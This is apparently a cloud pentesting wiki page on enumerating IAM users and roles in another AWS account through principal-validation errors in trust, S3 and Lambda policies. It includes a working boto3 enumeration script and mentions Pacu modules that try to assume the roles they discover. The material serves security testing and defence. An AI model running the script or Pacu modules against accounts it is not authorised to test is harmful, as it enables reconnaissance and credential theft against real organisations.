Unauthenticated IAM User and Role Enumeration
Exploiting an AWS feature of the IAM Role Trust Policy allowing for unauthenticated enumeration of AWS IAM Users and Roles in AWS Accounts.
This technique requires the target's AWS Account ID. Refer to Discover AWS Account IDs for methods on how to obtain it.
Rhino Security Labs has a great blog post detailing how this works.
Essentially, when you create or update an IAM Role's Trust Policy, AWS validates every principal ARN in the policy before accepting it. If the ARN resolves to an existing IAM User or Role, the update succeeds; if it does not, the call fails with a MalformedPolicyDocument error ("Invalid principal in policy").
Because the role you are modifying lives in your own account, every API call is made with your credentials and logged in your CloudTrail, not the target's. The target account receives no request at all, which is what makes the enumeration unauthenticated from its point of view.
First, create an IAM Role in your own account and then repeatedly update its Trust Policy, naming one candidate principal from the target account at a time.
Principals can be specified in an IAM Role's Trust Policy, and AWS returns an error if the principal is invalid, so each accepted update confirms a user or role that exists in the target account.
Create a Trust Policy document with a principal you know is valid (for example your own account's root ARN), so that the role can be created at all.
Create the IAM Role with that Trust Policy, then update it once per candidate ARN (arn:aws:iam::<target-account-id>:user/<name> or arn:aws:iam::<target-account-id>:role/<name>) and record which updates succeed. Use Effect Deny in the probe statements so that a valid principal you discover is never actually allowed to assume your probe role, and delete the role when you are done.
Pacu provides modules (iam__enum_users and iam__enum_roles) that automatically attempt to enumerate valid IAM Users and Roles in an AWS account using this method.
For roles, Pacu will also attempt to assume each discovered role; a role whose trust policy is misconfigured to allow it will hand back temporary credentials for that role.
Default wordlists are used unless you specify your own.
Principals can also be specified in an S3 Bucket's policy, and AWS will return an error (MalformedPolicy, "Invalid principal in policy") if the principal is invalid, so a bucket you own works as an alternative probe if you cannot create roles.
Principals can likewise be specified in a Lambda Function's resource policy, and AWS will return an error if the principal is invalid.
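The whole procedure (role-based and S3-based probing) as an added example in Python with boto3. This is not code from the page, from Rhino Security Labs or from Pacu. The target account ID 123456789012, the role name principal-probe and the wordlist are hypothetical; the FakeIamClient is a constructed stand-in that reproduces the real rejection message so the flow can be exercised offline. The live path assumes the credentials in your environment belong to your own account and can call iam:CreateRole and iam:UpdateAssumeRolePolicy there.

```python
"""Probe whether IAM user/role ARNs in another account exist, by placing them in a
policy in OUR account and watching whether AWS accepts or rejects the principal."""
import json
from typing import Callable, Iterable, List

try:
    import boto3  # only needed for live probing; everything else runs without it
except ImportError:
    boto3 = None

# Text AWS includes in the MalformedPolicyDocument (IAM) / MalformedPolicy (S3)
# error when a principal ARN in the policy does not resolve to a real identity.
INVALID_PRINCIPAL_MARKER = "Invalid principal in policy"


def candidate_arns(account_id: str, names: Iterable[str], kind: str) -> List[str]:
    """Turn a wordlist into user or role ARNs for the target account."""
    if kind not in ("user", "role"):
        raise ValueError("kind must be 'user' or 'role'")
    return [f"arn:aws:iam::{account_id}:{kind}/{name}" for name in names]


def trust_policy(principal_arn: str) -> str:
    """Trust policy naming one principal. Effect is Deny on purpose: we only want AWS
    to validate the ARN, never to let that principal actually assume our probe role."""
    return json.dumps({"Version": "2012-10-17", "Statement": [{
        "Effect": "Deny", "Principal": {"AWS": principal_arn},
        "Action": "sts:AssumeRole"}]})


def bucket_policy(bucket: str, principal_arn: str) -> str:
    """Same probe expressed as an S3 bucket policy on a bucket we own."""
    return json.dumps({"Version": "2012-10-17", "Statement": [{
        "Effect": "Deny", "Principal": {"AWS": principal_arn},
        "Action": "s3:GetObject", "Resource": f"arn:aws:s3:::{bucket}/*"}]})


def probe(apply_policy: Callable[[str], None], principal_arn: str) -> bool:
    """True if AWS accepted a policy naming principal_arn (it exists), False if AWS
    reported an invalid principal. Any other error (throttling, missing permission
    on our own role/bucket) is re-raised rather than misread as 'does not exist'."""
    try:
        apply_policy(principal_arn)
    except Exception as exc:  # botocore raises ClientError; str() carries the message
        if INVALID_PRINCIPAL_MARKER in str(exc):
            return False
        raise
    return True


def enumerate_principals(apply_policy, arns: Iterable[str]) -> List[str]:
    """Return the subset of arns that AWS confirmed as existing principals."""
    return [arn for arn in arns if probe(apply_policy, arn)]


def create_probe_role(iam_client, role_name: str, own_account_id: str) -> None:
    """Create the role with a principal that is guaranteed valid: our own root."""
    iam_client.create_role(RoleName=role_name,
                           AssumeRolePolicyDocument=trust_policy(
                               f"arn:aws:iam::{own_account_id}:root"))


def role_trust_policy_applier(iam_client, role_name: str):
    """Probe via iam:UpdateAssumeRolePolicy on a role in our account."""
    def apply(principal_arn: str) -> None:
        iam_client.update_assume_role_policy(
            RoleName=role_name, PolicyDocument=trust_policy(principal_arn))
    return apply


def bucket_policy_applier(s3_client, bucket: str):
    """Probe via s3:PutBucketPolicy on a bucket in our account."""
    def apply(principal_arn: str) -> None:
        s3_client.put_bucket_policy(Bucket=bucket, Policy=bucket_policy(principal_arn))
    return apply


class FakeIamClient:
    """Constructed stand-in for boto3's IAM client so the flow can run offline.
    Rejects any principal not in `existing` with the real error message shape."""
    def __init__(self, existing: Iterable[str]):
        self.existing = set(existing)

    def create_role(self, RoleName: str, AssumeRolePolicyDocument: str) -> None:
        self.update_assume_role_policy(RoleName, AssumeRolePolicyDocument)

    def update_assume_role_policy(self, RoleName: str, PolicyDocument: str) -> None:
        principal = json.loads(PolicyDocument)["Statement"][0]["Principal"]["AWS"]
        if principal not in self.existing and not principal.endswith(":root"):
            raise Exception(
                "An error occurred (MalformedPolicyDocument) when calling the "
                f"UpdateAssumeRolePolicy operation: {INVALID_PRINCIPAL_MARKER}: "
                f"AWS::{principal}")


if __name__ == "__main__":
    TARGET_ACCOUNT = "123456789012"   # hypothetical target account ID
    OWN_ACCOUNT = "210987654321"      # hypothetical: the account we control
    PROBE_ROLE = "principal-probe"
    wordlist = ["admin", "terraform", "ec2-admin", "backup"]  # constructed wordlist
    if boto3 is None:
        iam = FakeIamClient({f"arn:aws:iam::{TARGET_ACCOUNT}:user/admin"})
    else:
        iam = boto3.client("iam")     # our own credentials, never the target's
    create_probe_role(iam, PROBE_ROLE, OWN_ACCOUNT)
    apply = role_trust_policy_applier(iam, PROBE_ROLE)
    print(enumerate_principals(apply, candidate_arns(TARGET_ACCOUNT, wordlist, "user")))
    # Afterwards: delete PROBE_ROLE. Its trust policy still names the last hit
    # (harmlessly, with Effect Deny), and every probe is in your own CloudTrail.
```

Swap role_trust_policy_applier for bucket_policy_applier(boto3.client("s3"), "<your-bucket>") to run the same wordlist through an S3 bucket policy instead; the probe and enumeration logic is unchanged because both services reject a non-existent principal with the same "Invalid principal in policy" text. Errors that are not that rejection are deliberately re-raised: treating a throttling or permission error as "user does not exist" is the easiest way to get a false negative in a long wordlist run.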